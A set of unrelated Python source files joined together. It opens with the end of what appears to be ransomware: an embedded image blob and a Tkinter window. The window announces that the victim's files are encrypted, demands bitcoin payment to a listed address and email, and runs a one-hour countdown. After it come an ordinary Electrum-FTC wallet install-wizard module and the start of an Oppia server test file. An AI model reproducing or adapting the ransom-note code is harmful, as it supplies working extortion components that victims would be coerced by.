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'''
photo = PhotoImage(data=photo_code)
photo = photo.subsample(4)
label = Label(self, image=photo, background='black')
label.image = photo
label.grid(row=5, column=0, rowspan=2)
label = Label(self, image=photo, background='black')
label.image = photo
label.grid(row=5, column=3, rowspan=2)
message = f'''
YOUR FILES HAVE BEEN ENCRYPTED !
TO RECOVER YOUR FILES SEND US 10$ BITCOIN
AND SEND THE PAY CONFIRMATION WITH YOUR
TASK NUMBER TO : h3xv1ss1on@protonmail.com
BITCOIN : 1782x9AtVCQgv6GPjb9uHj1EoFhQocgEMs
TASK NUMBER : %s
Suki@Yosoevsky
'''%(self.special_key)
Label(self, text=message, wraplength=550, font='Helvetica 14 bold', foreground='white', background='red').grid(row=0, column=0, columnspan=4)
Label(self, text='', font='Helvetica 18 bold', foreground='red', background='black').grid(row=5, column=2)
Label(self, text='', font='Helvetica 18 bold', foreground='red', background='black').grid(row=6, column=2)
def start_thread():
thread = threading.Thread(target=start_timer)
thread.daemon = True
thread.start()
def start_timer():
Label(self, text='TIME LEFT:', font='Helvetica 18 bold', foreground='red', background='black').grid(row=5, column=0, columnspan=4)
try:
s = 3600
while s:
min, sec = divmod(s, 60)
time_left = '{:02d}:{:02d}'.format(min, sec)
Label(self, text=time_left, font='Helvetica 18 bold', foreground='red', background='black').grid(row=6, column=0, columnspan=4)
time.sleep(1)
s -= 1
if s == 1:
message = "Sorry :( Contact me in Yosoevsky@protonmail.com i ll help you"
Label(self, text=message, wraplength=1000, font='Helvetica 14 bold', foreground='white', background='black').grid(row=0, column=0, columnspan=4)
except KeyboardInterrupt:
pass
start_thread()
def a():
main = mainwindow("#0x00" + pass_gen(25, "without"))
main.mainloop()
def b():
for UI in range(100):
key = pass_gen(32, "with")
threading.Thread(target=a).start()
threading.Thread(target=b).start()
|
installwizard.py |
import os
import sys
import threading
import traceback
from PyQt5.QtCore import *
from PyQt5.QtGui import *
from PyQt5.QtWidgets import *
from electrum import Wallet, WalletStorage
from electrum.util import UserCancelled, InvalidPassword
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import *
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum-FTC, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:N2gSYKAVixyW... \t-> 6rMCZCrSH...\n' +
'p2wpkh-p2sh:N2gSYKAVixyW... \t-> 3NhNeZQXF...\n' +
'p2wpkh:N2gSYKAVixyW... \t-> fc1q3fjfk...\n' + '\n' +
'IMPORTANT: WIF keys that have been exported with \n' +
'Electrum-FTC 3.1.3.1 or older must be imported without\n' +
'specifying the script type')
# note: full key is N2gSYKAVixyW8eMLqZ2S3dBww26TNcEbJQKPKMaYsECzJf2tR8xt
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
synchronized_signal = pyqtSignal(str)
def __init__(self, config, app, plugins, storage):
BaseWizard.__init__(self, config, plugins, storage)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum-FTC - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon(':icons/electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def run_and_get_wallet(self, get_wallet_from_daemon):
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum-FTC wallet'))
wallet_folder = os.path.dirname(self.storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.storage = wallet_from_memory.storage
else:
self.storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.storage = None
self.next_button.setEnabled(False)
if self.storage:
if not self.storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
pw = False
elif not wallet_from_memory:
if self.storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
pw = True
elif self.storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
pw = False
else:
msg = _("Press 'Next' to open this wallet.")
pw = False
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
pw = False
else:
msg = _('Cannot read file')
pw = False
self.msg_label.setText(msg)
if pw:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
return
if self.storage.file_exists() and not self.storage.is_encrypted():
break
if not self.storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.storage.path)
if wallet_from_memory:
return wallet_from_memory
if self.storage.file_exists() and self.storage.is_encrypted():
if self.storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
elif self.storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.stack = []
return self.run_and_get_wallet(get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
return
if self.storage.is_past_initial_decryption():
break
else:
return
else:
raise Exception('Unexpected encryption version')
path = self.storage.path
if self.storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(self.storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
return
action = self.storage.get_action()
if action and action not in ('new', 'upgrade_storage'):
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
if action:
# self.wallet is set in run
self.run(action)
return self.wallet
self.wallet = Wallet(self.storage)
return self.wallet
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(filename).scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(None, msg, kind, self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(None, MSG_HW_STORAGE_ENCRYPTION, PW_NEW, self.next_button)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
def show_restore(self, wallet, network):
# FIXME: these messages are shown after the install wizard is
# finished and the window closed. On macOS they appear parented
# with a re-appeared ghost install wizard window...
if network:
def task():
wallet.wait_until_synchronized()
if wallet.is_found():
msg = _("Recovery successful")
else:
msg = _("No transactions found for this seed")
self.synchronized_signal.emit(msg)
self.synchronized_signal.connect(self.show_message)
t = threading.Thread(target = task)
t.daemon = True
t.start()
else:
msg = _("This wallet was restored offline. It may "
"contain more addresses than displayed.")
self.show_message(msg)
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title, message1, choices, message2,
test_text, run_next) -> (str, str):
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=()):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return ' '.join(line.text().split())
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
servers_test.py | # Copyright 2019 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for scripts/servers.py."""
from __future__ import absolute_import
from __future__ import unicode_literals
import collections
import contextlib
import logging
import os
import re
import shutil
import signal
import subprocess
import sys
import threading
import time
from unittest import mock
from core import python_utils
from core.tests import test_utils
from scripts import common
from scripts import scripts_test_utils
from scripts import servers
import psutil
class ManagedProcessTests(test_utils.TestBase):
# Helper class for improving the readability of tests.
POPEN_CALL = (
collections.namedtuple('POPEN_CALL', ['program_args', 'kwargs']))
def setUp(self):
super(ManagedProcessTests, self).setUp()
self.exit_stack = python_utils.ExitStack()
def tearDown(self):
try:
self.exit_stack.close()
finally:
super(ManagedProcessTests, self).tearDown()
@contextlib.contextmanager
def swap_popen(self, unresponsive=False, num_children=0, outputs=()):
"""Returns values for inspecting and mocking calls to psutil.Popen.
Args:
unresponsive: bool. Whether the processes created by the mock will
stall when asked to terminate.
num_children: int. The number of child processes the process created
by the mock should create. Children inherit the same termination
behavior.
outputs: list(bytes). The outputs of the mock process.
Returns:
Context manager. A context manager in which calls to psutil.Popen()
create a simple program that waits and then exits.
Yields:
list(POPEN_CALL). A list with the most up-to-date arguments passed
to psutil.Popen from within the context manager returned.
"""
popen_calls = []
def mock_popen(program_args, **kwargs):
"""Mock of psutil.Popen that creates processes using os.fork().
The processes created will always terminate within ~1 minute.
Args:
program_args: list(*). Unused program arguments that would
otherwise be passed to Popen.
**kwargs: dict(str: *). Keyword arguments passed to Popen.
Returns:
PopenStub. The return value of psutil.Popen.
"""
popen_calls.append(self.POPEN_CALL(program_args, kwargs))
pid = 1
stdout = b''.join(b'%b\n' % o for o in outputs)
child_procs = [
scripts_test_utils.PopenStub(pid=i, unresponsive=unresponsive)
for i in range(pid + 1, pid + 1 + num_children)
]
return scripts_test_utils.PopenStub(
pid=pid, stdout=stdout, unresponsive=unresponsive,
child_procs=child_procs)
with self.swap(psutil, 'Popen', mock_popen):
yield popen_calls
@contextlib.contextmanager
def swap_managed_cloud_datastore_emulator_io_operations(
self, data_dir_exists):
"""Safely swaps IO operations used by managed_cloud_datastore_emulator.
Args:
data_dir_exists: bool. Return value of os.path.exists(DATA_DIR).
Yields:
tuple(CallCounter, CallCounter). CallCounter instances for rmtree
and makedirs.
"""
old_exists = os.path.exists
old_rmtree = shutil.rmtree
old_makedirs = os.makedirs
is_data_dir = lambda p: p == common.CLOUD_DATASTORE_EMULATOR_DATA_DIR
new_exists = (
lambda p: data_dir_exists if is_data_dir(p) else old_exists(p))
new_rmtree = test_utils.CallCounter(
lambda p, **kw: None if is_data_dir(p) else old_rmtree(p, **kw))
new_makedirs = test_utils.CallCounter(
